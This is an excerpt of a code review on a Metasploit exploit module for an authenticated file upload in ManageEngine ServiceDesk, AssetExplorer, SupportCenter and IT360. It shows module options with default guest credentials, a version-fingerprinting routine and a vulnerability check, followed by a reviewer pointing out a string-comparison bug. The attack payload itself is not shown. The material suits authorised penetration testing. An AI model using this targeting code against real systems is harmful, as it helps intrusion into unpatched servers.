modules/exploits/multi/http/manageengine_auth_upload.rb

```diff
@@ -0,0 +1,427 @@
+        OptInt.new('SLEEP',
+          [true, 'Seconds to sleep while we wait for EAR deployment', 15]),
+        OptString.new('JSESSIONID',
+          [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
+        OptString.new('IAMAGENTTICKET',
+          [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
+        OptString.new('USERNAME',
+          [true, 'The username to login as', 'guest']),
+        OptString.new('PASSWORD',
+          [true, 'Password for the specified username', 'guest']),
+        OptString.new('DOMAIN_NAME',
+          [false, 'Name of the domain to logon to'])
+      ], self.class)
+  end
+
+
+  def get_version
+    res = send_request_cgi({
+      'uri'    => "/",
+      'method' => 'GET'
+    })
+
+    # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
+    version = [ "9999", "9999", "0", "sd" ]
+
+    if res && res.code == 200
+      if res.body.to_s =~ /ManageEngine ServiceDesk/
+        if res.body.to_s =~ /&nbsp;&nbsp;\|&nbsp;&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
+          output = $1
+          version = [ output[0], output[2], "0", "sd" ]
+        end
+        if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/     # newer builds
+          version[2] = $1
+        elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/   # older builds
+          version[2] = $1
+        end
+      elsif res.body.to_s =~ /ManageEngine AssetExplorer/
+        if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/   or
+        res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
+          output = $1
+          version = [ output[0], output[2], "0", "ae" ]
+        end
+        if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
+          version[2] = $1
+        end
+      elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
+        # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
+        version[3] = "sc"
+        if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
+          # ... but get the build number if we can find it
+          version[2] = $1
+        end
+      elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
+        # IT360 newer versions
+        version[3] = "it"
+      end
+    elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
+      # IT360 older versions, not a very good detection string but there is no alternative?
+      version[3] = "it"
+    end
+    return version
+  end
+
+
+  def check
+    version = get_version
+    # TODO: put fixed version on the two ifs below once (if...) products are fixed (sd is done)
+    if (version[0] <= "9" && version[0] > "4" && version[2] < "9031" && version[3] == "sd") ||    #sd was fixed on build 9031
```

Comment:
Careful:

```
irb(main):001:0> "10" < "9"
=> true
```

I admit that I've only taken a very quick look here, but you may want to consider using ```Gem::Version```, which implements Comparable for some common version patterns.  Give it a shot.